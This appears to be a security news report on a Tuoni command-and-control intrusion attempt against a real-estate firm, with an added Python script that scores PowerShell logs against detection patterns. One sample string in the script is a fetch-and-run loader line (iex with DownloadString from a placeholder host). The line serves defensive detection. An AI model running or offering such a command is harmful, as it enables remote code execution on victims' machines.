Cybersecurity researchers disclosed a mid-October 2025 intrusion attempt against a major U.S.-based real-estate company that involved the emerging Tuoni command-and-control framework. Morphisec researcher Shmuel Uzan said the campaign deployed stealthy, in-memory payloads tied to the Tuoni project.
Tuoni is marketed as a C2 and red-teaming framework for security professionals; a “Community Edition” is freely available on GitHub, and the tool was first released in early 2024, according to the disclosure shared with researchers.
The attackers appear to have gained initial access through social engineering involving Microsoft Teams impersonation, persuading an employee to run a PowerShell command. That command fetched a second PowerShell script from an external server and used steganography to conceal the next-stage payload inside a bitmap image; the embedded code extracted shellcode from the image and executed it in memory.
Execution led to a component identified as “TuoniAgent.dll,” which connected back to the external host. The DLL is the Tuoni agent: it runs on the compromised host and handles command-and-control communications, giving the operator remote control once the connection is established.
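The delivery chain described above (remote fetch of a second-stage script, a bitmap used as the payload carrier, and in-memory execution of the extracted bytes) lends itself to staged detection in PowerShell script-block logging. The following is an added defender-side example, not code from Morphisec or the Tuoni project; the stage names, regex lists, and sample log text are constructed here for illustration and are not indicators from the disclosed incident.

```python
"""Heuristic triage of PowerShell script-block log text for a staged
image-carrier delivery chain. A block that touches several stages of
the chain is more suspicious than one that only downloads a file."""
import re
from dataclasses import dataclass

# Constructed stage definitions (assumption: these cover the common
# .NET and Win32 calls such a chain needs; tune to your environment).
STAGES = {
    "remote_fetch": [r"Invoke-WebRequest", r"DownloadString", r"DownloadData",
                     r"Net\.WebClient", r"\biwr\b", r"\bcurl\b"],
    "image_carrier": [r"\.bmp\b", r"System\.Drawing\.Bitmap", r"GetPixel", r"LockBits"],
    "in_memory_exec": [r"VirtualAlloc", r"Marshal\]::Copy",
                       r"GetDelegateForFunctionPointer", r"Invoke-Expression", r"\biex\b"],
}


@dataclass
class Verdict:
    stages: list      # names of stages the block matched, in STAGES order
    score: int        # number of distinct stages matched
    suspicious: bool  # two or more stages in one block is the alert threshold


def triage_script_block(text: str) -> Verdict:
    """Score one script block; matching is case-insensitive like PowerShell."""
    hit = [name for name, pats in STAGES.items()
           if any(re.search(p, text, re.I) for p in pats)]
    return Verdict(hit, len(hit), len(hit) >= 2)


def suspicious_blocks(blocks: dict) -> list:
    """Return the names of blocks that cross the alert threshold."""
    return [name for name, text in blocks.items() if triage_script_block(text).suspicious]


# Constructed sample script-block text (example.invalid is a reserved name).
SAMPLES = {
    "benign_update": "Invoke-WebRequest -Uri https://example.invalid/update.json "
                     "-OutFile $env:TEMP\\update.json",
    "stego_loader": "iex ((New-Object Net.WebClient).DownloadString('https://example.invalid/s2.ps1')); "
                    "$bmp = New-Object System.Drawing.Bitmap '<path>.bmp'; <...> $bmp.GetPixel($x,$y) "
                    "<...> [System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $mem, $buf.Length)",
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        print(name, triage_script_block(text))
```

A single download is scored but not alerted on, which keeps ordinary update scripts quiet while a block that also decodes an image and moves bytes into unmanaged memory is flagged.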
Morphisec analysts noted that, while Tuoni itself is a sophisticated but conventional C2 framework, elements of the delivery chain showed signs of AI-assisted code generation, visible in the script comments and the modular loader structure. The company said the attack was ultimately unsuccessful; the incident follows other reports in 2025 of attackers experimenting with AI to accelerate exploitation.
The disclosure underscores continued abuse of red teaming and penetration-testing tools by threat actors and the blending of traditional techniques with new code-generation aids.